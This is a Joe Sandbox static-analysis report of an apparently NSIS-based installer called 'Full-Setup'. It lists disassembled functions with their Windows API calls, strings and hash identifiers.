Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

@, xrefs: 00404BBC
N, xrefs: 00404C32
, xrefs: 00404F65
M, xrefs: 00404B6F

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile("%s"), xrefs: 00406DE8
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
\*.*, xrefs: 00406D2F

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33
%s: failed opening file "%s", xrefs: 00406F38

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406858

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Unknown, xrefs: 00406528
Module32NextW, xrefs: 0040660A
PSAPI.DLL, xrefs: 00406490
Kernel32.DLL, xrefs: 004065C7
Module32FirstW, xrefs: 004065FF
GetModuleBaseNameW, xrefs: 004064C0
EnumProcessModules, xrefs: 004064B6
Process32FirstW, xrefs: 004065E9
EnumProcesses, xrefs: 004064AE
CreateToolhelp32Snapshot, xrefs: 004065E1
Process32NextW, xrefs: 004065F4

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
F, xrefs: 004042D3
N, xrefs: 00404298

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F
^F, xrefs: 00406ACF
plF, xrefs: 00406B54

Memory Dump Source

